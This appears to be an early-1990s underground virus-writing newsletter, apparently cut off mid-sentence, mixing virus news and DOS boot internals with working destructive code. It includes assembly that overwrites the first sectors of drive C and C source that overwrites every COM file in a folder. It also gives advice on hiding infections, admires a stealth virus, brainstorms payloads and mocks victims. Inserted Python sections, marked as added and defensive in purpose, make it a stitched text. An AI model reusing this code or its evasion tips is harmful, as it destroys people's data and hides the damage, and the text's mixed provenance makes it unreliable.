textfiles/virus/vir-3.v1


DISCLAIMER:
The author will NOT accept responsibility for any damage to your
computer media and/or files, or responsibility for any action you might
take that will result in legal proceedings. The source code, if any, in
this newsletter is THE REAL THING, and you, after you read this, will be
well aware of what virii are capable of; knowing that, it is expected
that you will act responsibly.
DISCLAIMER II:
All I know about programming I have learned on my own, and did not go to
school for, and am still learning. As a result, I am sometimes prone to
make mistakes, and be wrong about things, so please be patient if I should
make a mistake, or say something that isn't true, which would be totally
unintentional.
ViriiSearch
-----------
The Virus Research Newsletter
Volume 1, Number 3
Date: 08/02/92
CREDITS:
-----------------------------------------------------------------------------
Author...................................................Criminal Minded <tm>
Editor...................................................Criminal Minded <tm>
Ideas, Source, Examples Supplied By......................Criminal Minded <tm>
Facts Stolen From Several Sources By.....................Criminal Minded <tm>
-----------------------------------------------------------------------------
Introduction:
Welcome To The Third Issue Of Viriisearch, The Virus Research Newsletter. In
this issue you will find some changes: the layout has been changed slightly,
there are some new sections, and it is more organized. Let me know how you
like the changes, thanks!
In this issue:
-----------------------------------------------------------------------------
DEPARTMENTS: | FEATURES:
-----------------------------------------------------------------------------
In The News | Soviet Virii Attacks
| NASA's "No Nukes Worm"
| The Senate's Virus Bill
-----------------------------------------------------------------------------
Programming Shop | Absolute Disk Reads/Writes
-----------------------------------------------------------------------------
Programming Shop - Dissection Dept. | Explanation Of Above Example
-----------------------------------------------------------------------------
The Machine Shop | The Bootstrap Routine
-----------------------------------------------------------------------------
Sample Source Code Of Virii | A Replication Experiment
-----------------------------------------------------------------------------
"Suicidal Tendencies" Dept. | Leprosy (Strain C)
-----------------------------------------------------------------------------
Virus Info | The Devil's Dance Virus
-----------------------------------------------------------------------------
Articles | Unique Virii Names/Ideas
|------------------------------------
| Assembly vs C Language Virii
|------------------------------------
| My Profile Of A Virus Writer And
| My Views On The Virii Law
|------------------------------------
| Are Virii REALLY A Problem? And For
| Who?
|------------------------------------
| The Brain Virus: Fact And Fantasy
-----------------------------------------------------------------------------
Final Notes | Special Thanks, Greetings, Etc.
-----------------------------------------------------------------------------
In The News:
------------
-----------------------------------------------------------------------------
Welcome to a new section of Viriisearch! In this section we will cover virii
that made the news, old and new. Hope you enjoy the new section!
-----------------------------------------------------------------------------
The U.S.S.R. is already suffering from an outburst of computer viruses and
crimes. Computer users should look to U.S. experiences to learn about
information security before the problem escalates even further. Pirated
software is prevalent in the Soviet Union, purchased from Hong Kong and
Swiss connections. The existence of numerous viruses has been confirmed
by Soviet and Eastern European anti-viral programmers and includes Yankee
Doodle, Disk Killer 170X, Jerusalem, Friday The 13th COM and Victor, to
name a few. Three available antivirus programs are Lozinsky's Aidstest and
Kotik's Anti-Kot and Anti-Kor. Western and home-grown antivirus programs
are also being used. A lack of trained data security experts and data
security support services only makes the problem worse. The situation is
likely to worsen before serious measures are taken to combat both viruses
and crime. Decisions about protecting information are not being developed
either.
"Bozhe Mov! Hackers and viruses already plague Soviets."
Originally written by Sanford Sherizen.
Computerworld August 20th 1990, Page 74.
-----------------------------------------------------------------------------
This next "In The News" Article is about a worm, not a virus, but I found it
interesting and decided to re-print it.
-----------------------------------------------------------------------------
DEC users are warned by the U.S. Department of Defense's Computer Emergency
Response Team (C.E.R.T) that a worm discovered on a NASA computer network in
the third week of Oct. 1989 may find its way onto other DECnet networks. The
worm changed system banners to display an antinuclear message, and thus was
called the 'No Nukes Worm' by one NASA official. The program entered NASA's
Space Physics Analysis Network (S.P.A.N) through the DECnet Internet series
of networks that links approximately 13,000 computers, government agencies,
research centers, universities, and other facilities. DEC spokesman Jef
Gibson said that VAX/VMS system managers should have closed the loophole
through which the worm gained access after it was discovered in Dec. 1988.
NASA believes the worm may have been intended to protest the launch of the
Atlantis space shuttle that carried a plutonium powered probe on its way to
Jupiter.
"Worms eats holes in NASA's DECnet; 'No Nukes Worm' replaces system banners
with antinuclear message"
Originally written by Michael Alexander and Maryfran Johnson.
Computerworld October 23rd 1989. Page 4.
-----------------------------------------------------------------------------
A Senate bill updating the Computer Fraud and Abuse Act of 1986 is being
praised by computer and legal experts, but its passage could encourage
lawsuits against innocent institutions. The bill redefines the notion of
computer 'access' to cover the intentional transmission or distribution of
unauthorized applications that somehow cause damage to either hardware,
software, or data. Intentional abusers face felony charges with penalties
up to five years in prison and a $250,000 fine. The reckless, albeit
unintentional, transmission of virus-ridden software could result in a
misdemeanor charge and up to one year in jail and a $5,000 fine. The reach
of the previous law would also be extended to include computers used in
interstate communications or commerce. A U.S. Department of Justice official
says the bill grants prosecutors greater flexibility.
"Virus bill raises hopes, fears: updated laws could hold unwitting
transmitters liable for damages. (Computer Fraud and Abuse Act of 1986)"
Originally written by Gary H. Anthes.
Computerworld August 13th, 1990. Page 45.
-----------------------------------------------------------------------------
Programming Shop:
-----------------
*****************************************************************************
First we will cover absolute disk reads/writes using Assembly language.
*****************************************************************************
This next example will write the contents of 'buffer' to the first ten
sectors of drive C:
*****************************************************************************
WARNING: There is NO recovery from this.
*****************************************************************************
abswrite proc near
buffer db 'Lick Me' dup (?)
mov al,2
mov cx,10
mov dx,1
mov bx,seg buffer
mov ds,bx
mov bx,offset buffer
int 26h
jc error
add sp,2
abswrite endp
*****************************************************************************
Next is absolute disk read(s)
*****************************************************************************
absread proc near
buffer db 512 dup (?)
mov al,2
mov cx,10
mov dx,1
mov bx,seg buffer
mov ds,bx
mov bx,offset buffer
int 25h
jc error
add sp,2
absread endp
*****************************************************************************
Programming Shop - Dissection Dept.
*****************************************************************************
absread proc near
buffer db 512 dup (?)
mov al,2
mov cx,10
mov dx,1
mov bx,seg buffer
mov ds,bx
mov bx,offset buffer
int 25h
jc error
add sp,2
absread endp
*****************************************************************************
First we will discuss absolute disk read(s).
The line "mov al,2" is telling which drive we want to read from. Drives are
numbered from zero (0 = A, 1 = B), so drive #2 is drive C.
The next line, "mov cx,10", is telling how many sectors we want to read (10).
The line "mov dx,1" is telling the starting sector number to start reading
at (1).
The next three lines:
mov bx,seg buffer
mov ds,bx
mov bx,offset buffer
establish the address of the buffer, so that DS:BX points to the
segment:offset of the buffer.
The next line, "int 25h", invokes interrupt 25h, the DOS "absolute read"
service.
The next line, "jc error", jumps if there is an error (the carry flag is set).
And the last line, "add sp,2", clears the stack.
Notes: The purpose of clearing the stack using "add sp,2" is that, when
int 25h (or int 26h) returns, the CPU flags originally pushed onto the stack
by the interrupt call are still on it. You should clear it to prevent
uncontrolled stack growth and to make available any other values pushed onto
the stack before the call.
*****************************************************************************
Next we will discuss absolute disk write(s) and the difference between the
two functions, read and write.
*****************************************************************************
As you can see, there is little difference between the two:
Absolute Read: Absolute Write:
_____________________________________________________________________________
absread proc near | abswrite proc near
buffer db 512 dup (?) | buffer db 'Lick Me' dup (?)
mov al,2 | mov al,2
mov cx,10 | mov cx,10
mov dx,1 | mov dx,1
mov bx,seg buffer | mov bx,seg buffer
mov ds,bx | mov ds,bx
mov bx,offset buffer | mov bx,offset buffer
int 25h | int 26h
jc error | jc error
add sp,2 | add sp,2
absread endp | abswrite endp
-----------------------------------------------------------------------------
Absolute disk read and absolute disk write are identical except for four
lines:
Note: Periods replace the lines in each example that are identical.
-----------------------------------------------------------------------------
absread proc near | abswrite proc near
buffer db 512 dup (?) | buffer db 'Lick Me' dup (?)
. | .
. | .
. | .
. | .
. | .
. | .
int 25h | int 26h
. | .
. | .
absread endp | abswrite endp
-----------------------------------------------------------------------------
The differences in the above examples are as follows:
The first line: This is the beginning of each procedure. They are named for
what they do, absread for absolute read and abswrite for absolute write. You
could've named the two procedures something else, for instance: shithead and
dickhead, and it wouldn't matter.
The second line: In the case of absolute read, we have our buffer declared as
512 bytes and not initialized. In the case of absolute write, we have the
buffer initialized to store the string 'Lick Me'.
The ninth line: This line is the interrupt number, int 25h being the interrupt
for absolute disk read, and int 26h being the interrupt for absolute disk
write.
The twelfth line: This is just the end of each of the two procedures.
*****************************************************************************
The Machine Shop:
-----------------
-----------------------------------------------------------------------------
Welcome to a brand new section of Viriisearch! Here we will discuss hardware
oriented subjects, such as RAM, Machine Cycles, Boot Routines, etc.
-----------------------------------------------------------------------------
This month we will discuss the 'Bootstrap' routine.
-----------------------------------------------------------------------------
Many people turn on their machines, let DOS load and don't think a second
thought about it. Those people also take MS-DOS for granted and don't even
care what it is doing, even though it is the most important piece of software
an IBM user can have. One of my favorite sayings: 'A Computer Without MS-DOS
Is Little More Than A Boat Anchor'
Here I will tell exactly what MS-DOS does from the second you hit the power
switch up until the time you get the prompt --> C>
When the system is started or reset, program execution begins at address
0FFFF0H. This is a feature of the 8086/8088 family of microprocessors and
has nothing to do with MS-DOS. Systems based on these processors are designed
so that address 0FFFF0H lies within an area of ROM and contains a jump machine
instruction to transfer control to system test code and the ROM bootstrap
routine.
The ROM bootstrap routine reads the disk bootstrap routine from the first
sector of the system startup disk (the boot sector) into memory at some
arbitrary address and then transfers control to it. (The boot sector also
contains a table of information about the disk format.)
The disk bootstrap routine checks to see if the disk contains a copy of
MS-DOS. It does this by reading the first sector of the root directory
and determining whether the first two files are IO.SYS and MSDOS.SYS (or
IBMBIO.COM and IBMDOS.COM), in that order. If these files are not present,
the user is prompted to change disks and strike any key to try again. If
the two system files are found, the disk bootstrap routine reads them into
memory and transfers control to the initial entry point of IO.SYS. (In some
implementations, the disk bootstrap routine reads only IO.SYS into memory,
and IO.SYS in turn loads the MSDOS.SYS file.)
The IO.SYS file that is loaded from the disk actually consists of two separate
modules. The first is the BIOS, which contains the linked set of resident
device drivers for the console, auxiliary port, printer, block, and clock
devices, plus some hardware specific initialization code that is run only at
system startup. The second module, SYSINIT, is supplied by Microsoft and
linked into the IO.SYS file, along with the BIOS, by the computer manufacturer.
SYSINIT is called by the manufacturer's BIOS initialization code. It determines
the amount of contiguous memory present in the system and then relocates
itself to high memory. Then it moves the DOS kernel, MSDOS.SYS, from its
original load location to its final memory location, overlaying the original
SYSINIT code and any other expendable initialization code that was contained
in the IO.SYS file.
Next, SYSINIT calls the initialization code in MSDOS.SYS. The DOS kernel
initializes its internal tables and work areas, sets up the interrupt vectors
20H through 2FH, and traces through the linked list of resident device
drivers, calling the initialization function for each. These driver functions
determine the equipment status, perform any necessary hardware initialization,
and set up the vectors for any external hardware interrupts the drivers will
service.
As part of the initialization sequence, the DOS kernel examines the disk
parameter blocks returned by the resident block-device drivers, determines the
largest sector size that will be used in the system, builds some drive
parameter blocks, and allocates a disk sector buffer. Control then returns to
SYSINIT.
When the DOS kernel has been initialized and all the resident device drivers
are available, SYSINIT can call on the normal MS-DOS file services to open
the CONFIG.SYS file. This optional file can contain a variety of commands
that enable the user to customize the MS-DOS environment. For instance, the
user can specify additional hardware device drivers, the number of disk
buffers, the maximum number of files that can be open at one time, and the
file name of the command processor (shell).
If it is found, the entire CONFIG.SYS file is loaded into memory for
processing. All lowercase characters are converted to uppercase, and the file
is interpreted one line at a time to process the commands. Memory is allocated
for the disk buffer cache and the internal file control blocks used by the
handle file and record system functions. Any device drivers indicated in the
CONFIG.SYS file are sequentially loaded into memory, initialized by calls to
their init modules, and linked into the device driver list. The init function
of each driver tells SYSINIT how much memory to reserve for that driver. After
all installable device drivers have been loaded, SYSINIT closes all file
handles and reopens the console (CON), printer (PRN), and auxiliary (AUX)
devices as the standard input, standard output, standard error, standard list,
and standard auxiliary devices. This allows a user-installed character device
driver to override the BIOS's resident drivers for the standard devices.
Finally, SYSINIT calls the MS-DOS EXEC function to load the command
interpreter, or shell. (The default shell is COMMAND.COM, but another shell
can be substituted by means of the CONFIG.SYS file.) Once the shell is loaded,
it looks for AUTOEXEC.BAT, automatically running any internal DOS commands and
external commands inside that file. If it doesn't find AUTOEXEC.BAT it will
ask for the date and time (provided a clock chip isn't present) and then
display the prompt, waiting for the user to enter a command. MS-DOS is now
ready for business, and SYSINIT is discarded.
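As an added example, not code from the newsletter: a Python model of the logical sector read the Programming Shop's int 25h routine performs (DX = starting sector, CX = count, sectors numbered from 0) on a constructed 360K FAT12 floppy image, followed by the checks the disk bootstrap routine described above makes (boot signature, the BPB table in the boot sector, and the first two root directory entries being IO.SYS and MSDOS.SYS in that order). It also maps the Programming Shop's write to sectors 1 through 10 onto the structures it lands on in this layout, which is why there is no recovery from it. The whole image, including the BPB values and directory entries, is constructed.

```python
"""Logical sector reads and the disk bootstrap's checks on a constructed
FAT12 floppy image (added example, not the newsletter's code)."""
import struct

SECTOR = 512
# BIOS Parameter Block at offset 11 of the boot sector (FAT12 layout).
BPB_FMT = "<HBHBHHBH"
BPB_FIELDS = ("bytes_per_sector", "sectors_per_cluster", "reserved_sectors",
              "fats", "root_entries", "total_sectors", "media",
              "sectors_per_fat")


def read_sectors(image: bytes, start: int, count: int) -> bytes:
    """COUNT logical sectors from sector START (0 = boot sector), the same
    parameters int 25h takes in DX and CX. Where int 25h sets CF, we raise."""
    if start < 0 or count < 1 or (start + count) * SECTOR > len(image):
        raise ValueError("sector range outside the image")
    return image[start * SECTOR:(start + count) * SECTOR]


def parse_bpb(image: bytes) -> dict:
    """Decode the 'table of information about the disk format' in sector 0."""
    boot = read_sectors(image, 0, 1)
    if boot[510:512] != b"\x55\xAA":
        raise ValueError("missing 55AA boot signature")
    return dict(zip(BPB_FIELDS, struct.unpack_from(BPB_FMT, boot, 11)))


def root_dir_span(bpb: dict) -> tuple:
    """(first sector, sector count) of the root directory."""
    first = bpb["reserved_sectors"] + bpb["fats"] * bpb["sectors_per_fat"]
    length = (bpb["root_entries"] * 32 + SECTOR - 1) // SECTOR
    return first, length


def entry_name(entry: bytes) -> str:
    """Turn an 11-byte 'NAME    EXT' directory field into NAME.EXT."""
    base = entry[0:8].decode("ascii").rstrip()
    ext = entry[8:11].decode("ascii").rstrip()
    return f"{base}.{ext}" if ext else base


def first_two_entries(image: bytes) -> list:
    """What the disk bootstrap looks at: the first two root directory names."""
    first, _ = root_dir_span(parse_bpb(image))
    root = read_sectors(image, first, 1)
    return [entry_name(root[i * 32:(i + 1) * 32]) for i in range(2)]


def system_files_present(image: bytes) -> bool:
    """True when the system files are there in the order DOS expects."""
    names = first_two_entries(image)
    return names in (["IO.SYS", "MSDOS.SYS"], ["IBMBIO.COM", "IBMDOS.COM"])


def region(bpb: dict, sector: int) -> str:
    """Which on-disk structure a logical sector belongs to."""
    if sector == 0:
        return "BOOT"
    if sector < bpb["reserved_sectors"]:
        return "RESERVED"
    fat_end = bpb["reserved_sectors"] + bpb["fats"] * bpb["sectors_per_fat"]
    if sector < fat_end:
        n = (sector - bpb["reserved_sectors"]) // bpb["sectors_per_fat"] + 1
        return f"FAT{n}"
    first, length = root_dir_span(bpb)
    return "ROOT" if sector < first + length else "DATA"


def regions_hit(image: bytes, start: int, count: int) -> list:
    """Structures a write of COUNT sectors from START would overwrite."""
    bpb = parse_bpb(image)
    seen = []
    for s in range(start, start + count):
        r = region(bpb, s)
        if r not in seen:
            seen.append(r)
    return seen


def build_image() -> bytearray:
    """Constructed 360K-style floppy: 1 reserved sector, 2 FATs of 2 sectors,
    112 root entries, with IO.SYS and MSDOS.SYS as the first two entries."""
    img = bytearray(SECTOR * 40)          # only the first sectors matter here
    img[0:3] = b"\xEB\x3C\x90"            # jump over the BPB to the boot code
    img[3:11] = b"MSDOS5.0"               # OEM name (constructed)
    struct.pack_into(BPB_FMT, img, 11, 512, 2, 1, 2, 112, 720, 0xFD, 2)
    img[510:512] = b"\x55\xAA"
    root = (1 + 2 * 2) * SECTOR           # root directory starts at sector 5
    img[root:root + 11] = b"IO      SYS"
    img[root + 11] = 0x27                 # read-only, hidden, system, archive
    img[root + 32:root + 43] = b"MSDOS   SYS"
    img[root + 43] = 0x27
    return img


if __name__ == "__main__":
    disk = build_image()
    print(first_two_entries(disk), system_files_present(disk))
    print("sectors 1-10 overwrite:", regions_hit(disk, 1, 10))
```

On this layout sectors 1 through 10 are both FAT copies and most of the root directory, so the abswrite example destroys the allocation tables and the directory together.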
-----------------------------------------------------------------------------
Sample Source Code Of Virii:
----------------------------
-----------------------------------------------------------------------------
This month we will discuss something I have been fooling around with and have
finally completed. It is not a virus, but can be modified and made into one.
What the following code basically does is find all the COM files in the
current directory, and overwrite them with itself. It's basically a
replicating program.
-----------------------------------------------------------------------------
#include <malloc.h>
#include <direct.h>
#include <dos.h>
#include <fcntl.h>
#include <sys\types.h>
#include <sys\stat.h>
#include <io.h>
#include <stdio.h>
FILE *file1,*file2;
int main(void);
main()
{
    long size;
    char *code = NULL;
    struct find_t com_file;
    _dos_findfirst("*.COM", _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &com_file);
    chmod(com_file.name, S_IREAD|S_IWRITE);
    file1=fopen("HELLO.EXE","rb");
    file2=fopen(com_file.name,"wb");
    size=filelength(fileno(file1));
    code=malloc(size);
    fread(code, size, 1, file1);
    fwrite(code, size, 1, file2);
    while (_dos_findnext(&com_file) == 0)
    {
        chmod(com_file.name, S_IREAD|S_IWRITE);
        file2=fopen(com_file.name,"wb");
        fwrite(code, size, 1, file2);
    }
    fcloseall();
    free(code);
}
-----------------------------------------------------------------------------
Ok, this line:
_dos_findfirst("*.COM", _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &com_file);
finds the first occurrence of a COM file with any of the attributes listed.
They are "ORed" together using the | character. It passes the filename to
the "com_file" structure, and references to that file are now: com_file.name
Upon one being found, it goes on to:
chmod(com_file.name, S_IREAD|S_IWRITE);
which changes the attributes of the file found so that it can be written to.
The next line opens the file you want to replicate in "read binary" mode; that
is what the "rb" switch is for.
file1=fopen("HELLO.EXE","rb");
Then it opens the first COM file, the 'victim' to be overwritten, in "write
binary" mode (that's what the "wb" is for):
file2=fopen(com_file.name,"wb");
Then it obtains the size of the virus and allocates enough memory for it.
size=filelength(fileno(file1));
code=malloc(size);
Then it reads the virus code into the buffer "code", which is size "size", is
1 item, and is read from "file1":
fread(code, size, 1, file1);
Then it takes "code", which is size "size", is 1 item, and writes it to "file2":
fwrite(code, size, 1, file2);
Once it is done with that, it goes on to the loop:
while (_dos_findnext(&com_file) == 0)
{
    chmod(com_file.name, S_IREAD|S_IWRITE);
    file2=fopen(com_file.name,"wb");
    fwrite(code, size, 1, file2);
}
Both _dos_findfirst() and _dos_findnext() return 0 if they are successful at
finding the specified file, so basically this loop is saying:
"keep going as long as _dos_findnext(&com_file) equals 0"
What it does every time it passes through the loop (i.e. finds a COM file):
changes the mode of the file so it can be written to, opens that file in
"write binary" mode, and writes the virus code to it.
When there are no more COM files found, the loop is done and it goes on to the
next part of the program:
fcloseall();
free(code);
}
It closes all open files associated with this program, releases the previously
allocated memory for the virus code, and exits.
-----------------------------------------------------------------------------
NOTES:
This is kind of slow but is somewhat faster than the example in issue #2 that
truncated files to 0 bytes. You can also fool around with getting and setting
the file's date and time, and changing its size back to what it was originally
to cover your tracks.
-----------------------------------------------------------------------------
Suicidal Tendencies Dept/Virus Of The Month:
-----------------------------------------------------------------------------
The virus of the month award goes to: Leprosy (C Strain)
-----------------------------------------------------------------------------
NOTE: This is actually Leprosy B Strain, but modified by TBSI so McAfee's
scanner wouldn't find it. Originally written by PCM2 in August of 1990.
Modified by TBSI in June of 1991.
PCM2, the person who wrote this, and all other strains of Leprosy, did a real
nice job with this one. I placed the file, LEPROSYC.COM, on a 5.25" 360K
floppy in drive B and this is what was on the disk:
Volume in drive B has no label
Directory of B:\
COMMAND COM 47845 04-09-91 5:00a
ANSI SYS 9029 04-09-91 5:00a
RAMDRIVE SYS 5873 04-09-91 5:00a
CONFIG SYS 39 01-01-80 12:35a
SYS COM 13440 04-09-91 5:00a
NDOS COM 2419 08-14-84 12:00p
MEM EXE 39818 04-09-91 5:00a
DEBUG EXE 21692 06-07-90 2:24a
AUTOEXEC BAT 69 01-01-80 3:37a
PKUNZIP EXE 23528 03-15-90 1:10a
LEPROSYC COM 666 06-05-91 12:36a
11 file(s) 164418 bytes
192512 bytes free
This is BEFORE I ran the virus...this is after:
Volume in drive B has no label
Directory of B:\
COMMAND COM 47845 04-09-91 5:00a
ANSI SYS 9029 04-09-91 5:00a
RAMDRIVE SYS 5873 04-09-91 5:00a
CONFIG SYS 39 01-01-80 12:35a
SYS COM 13440 04-09-91 5:00a
NDOS COM 2419 08-14-84 12:00p
MEM EXE 39818 04-09-91 5:00a
DEBUG EXE 21692 06-07-90 2:24a
AUTOEXEC BAT 69 01-01-80 3:37a
PKUNZIP EXE 23528 03-15-90 1:10a
LEPROSYC COM 666 06-05-91 12:36a
11 file(s) 164418 bytes
192512 bytes free
There is not one single difference with any of the files, yet EVERY .EXE and
.COM file on the disk was infected. No changes in size, no date/time changes.
Well, the dates and times did change but the virus preserves the original date
and time stamps, restoring them once the infection is complete. But no changes
in file sizes.....this virus was very well written. It was fast, efficient,
and very small in size. The source code to this particular virus is 16664
bytes, and, as you can see, the .COM file is only 666 bytes. This is what the
virus did when run: It accessed drive B for a few seconds, and gave me the
error message: Program too big to fit into memory. I did not notice any
changes at all so I assumed it didn't infect any of the files, but when I ran
each .EXE and .COM file on the disk, they all gave me that error message...
'Program too big to fit into memory' so I assume they all were infected.
The program is actually supposed to give me this message when it is done:
ATTENTION! Your computer has been afflicted with
the incurable decay that is the fate wrought by
Leprosy Strain B, a virus employing Cybernetic
Mutation Technology(tm) and invented by PCM2 08/90.
For some reason it did not display this message. Perhaps there is a certain
number of files it must infect before it displays it. I did not take too
good of a look at the source to determine this. All in all a very nicely
written virus, does its job fast and very efficiently.
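As an added example, not code from the newsletter and not the virus's own code: a baseline integrity check written from the defender's side. It separates the crude overwrite the replicating program above performs (file sizes change, and every victim becomes a copy of the same file) from the stealthier pattern described for Leprosy here (content changed, size and timestamps preserved), which a size-and-date comparison alone would miss. The directory, file names and contents are constructed in a temporary folder.

```python
"""Baseline integrity check for .COM/.EXE files (added example, not the
newsletter's code): flags plain overwrites, stealth overwrites that keep
size and mtime, and groups of files that have become identical."""
import hashlib
import os
import tempfile

EXECUTABLE_EXTS = (".com", ".exe")


def fingerprint(path: str) -> tuple:
    """(size, mtime in whole seconds, sha256 hex) for one file."""
    st = os.stat(path)
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return (st.st_size, int(st.st_mtime), h.hexdigest())


def baseline(directory: str) -> dict:
    """Fingerprint every .COM/.EXE in DIRECTORY, keyed by file name."""
    return {name: fingerprint(os.path.join(directory, name))
            for name in sorted(os.listdir(directory))
            if name.lower().endswith(EXECUTABLE_EXTS)}


def compare(before: dict, after: dict) -> dict:
    """Classify each baseline entry. 'stealth' means the content hash changed
    while size and mtime stayed the same, the Leprosy pattern."""
    report = {"changed": [], "stealth": [], "missing": [], "new": []}
    for name, (size, mtime, digest) in before.items():
        if name not in after:
            report["missing"].append(name)
            continue
        size2, mtime2, digest2 = after[name]
        if digest2 == digest:
            continue
        if size2 == size and mtime2 == mtime:
            report["stealth"].append(name)
        else:
            report["changed"].append(name)
    report["new"] = [name for name in after if name not in before]
    return report


def identical_content(snapshot: dict) -> list:
    """Groups of files sharing one hash: an overwriting replicator leaves
    every victim as a byte-for-byte copy of the same program."""
    groups = {}
    for name, (_, _, digest) in snapshot.items():
        groups.setdefault(digest, []).append(name)
    return sorted(sorted(names) for names in groups.values() if len(names) > 1)


def demo() -> dict:
    """Constructed scenario: three COM files and one EXE, then the effect of a
    crude overwrite on two of them and a stealth overwrite on the third."""
    with tempfile.TemporaryDirectory() as d:
        files = {"A.COM": b"A" * 300, "B.COM": b"B" * 500,
                 "C.COM": b"C" * 700, "HELLO.EXE": b"MZ" + b"H" * 1000}
        for name, data in files.items():
            with open(os.path.join(d, name), "wb") as f:
                f.write(data)
        before = baseline(d)
        # Effect of the replicating program above: A.COM and B.COM become
        # copies of HELLO.EXE, so their sizes change.
        for name in ("A.COM", "B.COM"):
            with open(os.path.join(d, name), "wb") as f:
                f.write(files["HELLO.EXE"])
        # Effect of a size-preserving infection that restores the timestamp.
        path = os.path.join(d, "C.COM")
        st = os.stat(path)
        with open(path, "r+b") as f:
            f.write(b"X" * 100)            # patch in place, length unchanged
        os.utime(path, (st.st_atime, st.st_mtime))
        after = baseline(d)
        return {"report": compare(before, after),
                "duplicates": identical_content(after)}


if __name__ == "__main__":
    print(demo())
```

A check that only compares sizes and dates, which is all a DIR listing shows, would report the Leprosy case as clean; the hash comparison is what catches it.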
-----------------------------------------------------------------------------
Virus Info:
-----------
-----------------------------------------------------------------------------
Welcome to a brand new section of Viriisearch! In this section we will give
valuable information on a virus, such as origin, aliases, etc. Some of the
info presented here is taken from the file: MSDOS.ZIP, an index of DOS virii.
Other info presented was supplied by me, such as the scan string, name of
virus author, etc.
-----------------------------------------------------------------------------
Virus Spotlight This Month Will Cover: The Devil's Dance Virus
*****************************************************************************
Name Of Virus: The Devil's Dance Virus
Virus Aliases: Devil/941 Virus
Name Of Virus Author: N/A
Language Virus Was Written In: N/A
Date Virus Was First Discovered Or Originated: Spring of 1990
Place Virus Was First Discovered Or Originated: Mexico City
Scan String:
0L0G0M0H0G1U0G0R0HBK2MDY3Y0G0G4MCU0G2LDG1Y4LCU0G2L0G2MBR4SDNFLDN8H3XFW4XBW5U0
G2L1WDNFGFM0H0JBR0G0Q6MAV0G0M6GFK0G0MBV7W0G0M6GFK0G0M7Z0G0M9SEJBZ1L0G0M5S0G2L
1L0G0M1L0G0MEW0G0MBR0M0MAW4Q0K0G0G
Checksum: CF3C
Hooked Interrupts: INT 21H, functions 4B00H and 49H, INT 09H
Trigger: Upon INT 21H, function 4B00H, being called, the .COM file will be
infected. Also, if you hit the CTRL-ALT-DEL sequence anytime after
typing a total of 2,500 characters, the first sector of drive C will
be overwritten.
Identification: If you do a hexadecimal dump of the virus, the following:
"Drk" & "*.com"
should be seen in the code.
Also, the time and date of the infected file is set to the
time and date of infection.
If you reset the system by pressing CTRL-ALT-DEL, the virus
will display the following message:
"Have you ever danced with"
"the devil under the weak light of the moon?"
"Pray for your disk! The_Joker..."
"Ha Ha Ha Ha Ha Ha Ha Ha Ha Ha".
If your monitor/card supports color, all characters typed
will be in a different color.
Size & Name Of Original Virus EXE/COM File: N/A
Techniques Used: All file attributes are removed and the following message is
encrypted:
"Have you ever danced with"
"the devil under the weak light of the moon?"
"Pray for your disk! The_Joker..."
"Ha Ha Ha Ha Ha Ha Ha Ha Ha Ha".
What It Attacks:
.COM Files: Yes
.EXE Files: No
COMMAND.COM: Yes (If in the current directory when virus is first run, or if
COMMAND.COM is run)
Boot Sector: No
File Allocation Table (FAT): No
Fixed Disk Partition Table: No
Note: The Boot Sector, FAT, or Fixed Disk Partition Table MAY be attacked if
any of them reside on the first sector of drive C because the virus
does attack that part of the drive. (See Damage Report)
It depends on your drive and what resides in the first sector.
Change In Size/Date/Time Of Infected File: 941 bytes; date and time are changed
to the system's date and time at the time of infection.
Virus Volume Label: None
Known Number Of Strain(s): None
Damage: When the virus is first run, it will infect ALL the .COM files in the
current directory. After pressing 2,500 keys, if you should reset the system by
pressing CTRL-ALT-DEL, the virus will overwrite the first sector of drive C.
Also, any .COM file you run will be infected. If the .COM file infected is
bigger than 64,337 bytes, it will not run correctly after being infected.
*****************************************************************************
---------
Articles:
---------
****************************
* Unique Virii Names/Ideas *
****************************
I was looking at some virii names recently, and I noticed that a few of them
are pretty stupid...like 'Fuck you' or 'Fuck Me' or 'Phuck'....it does not
take too much intelligence to think up these names so that's why I decided
to include this article in this month's Viriisearch <tm> and here are some
virii names and ideas that I thought of:
-----------------------------------------------------------------------------
Stolichnaya - Maybe we could have this one display a picture of Kitty Dukakis
as it deletes your files or trashes your hard drive.
Valhalla - For those of you who don't know, Valhalla is the Viking Heaven.
To be honest, I didn't really put much thought into what this
would do as a virus.....I just like the name and thought it
might be a cool name for a virus.
Red Sector A - This is a song by Canadian Power Trio, Rush. Perhaps this can
overwrite the boot sector with the lyrics to the song. Maybe
have it pick randomly from a list of tour dates from the 'Roll
the bones' tour as its trigger date.
4th Of July - We have virii for Christmas, Columbus Day, etc....but I have
not seen one called 4th Of July....so here we are...
Blizzard - We could have this annoy the user with random 'snow' on the
monitor which gradually gets worse and worse until you can no
longer see the screen. While it is doing that and flashing
fake error messages, it can eat some files or encrypt the file
allocation table or something. We can also have its trigger
date as the date that the Blizzard of '78 hit...
*****************************************************************************
********************************
* Assembly vs C Language Virii *
********************************
Most C language functions are written in Assembly, so some consider C a
modified Assembly language....and some also claim that a well written C
program is almost as fast as Assembly. This may be true, but when it comes
to writing a virus, I say Assembly is the winner hands down. Earlier we had
discussed the "Leprosy-B" virus. The Assembly source code to that virus is
16664 bytes and the .COM is a remarkable 666 bytes. If I tried to write that
virus in C language, the smallest I could get the .COM or .EXE file would be
about 8 kilobytes if I was lucky. In a previous issue, we discussed my ATTRB
program which is about 3K in source, and a 9K executable, and that is really
good for C language...here we have a .COM file smaller than the source code.
Well over 20% smaller.
*****************************************************************************
*********************************
* My Profile Of A Virus Writer *
* And My Views On The Virus Law *
*********************************
A lot of people may wonder why someone would want to write a virus. Some
people believe it's a former employee wanting revenge against his company.
Others believe that it's a personal vendetta against a fellow computer user
or the sysop of a BBS, or a student wishing to piss his teacher off. Some or
all of these may be true, but I personally believe that one person cannot
possibly be mad at all of the computer society. So, why would someone want to
write a virus? Well, Phalcon/Skism (Canada) claim they do it to 'make the
lives of the anti-viral people a living hell' so there's one reason. I also
believe they do it because THEY CAN. That's it. They do it because they know
how. I don't see the average virus writer as a basket case genius egomaniac
as a lot of people do, I see them as an ordinary every day person with very
good programming abilities and nothing more. I do not sympathize with any
person that gets hit by a virus, either. I sit there and laugh alongside the
person who wrote the virus. Sound cruel? Well, I have my reasons. People know
they exist, and all the information they need to protect themselves and
prevent virus attacks is all right there for the taking. Not just in the
underground so there is no excuse why these people cannot obtain these
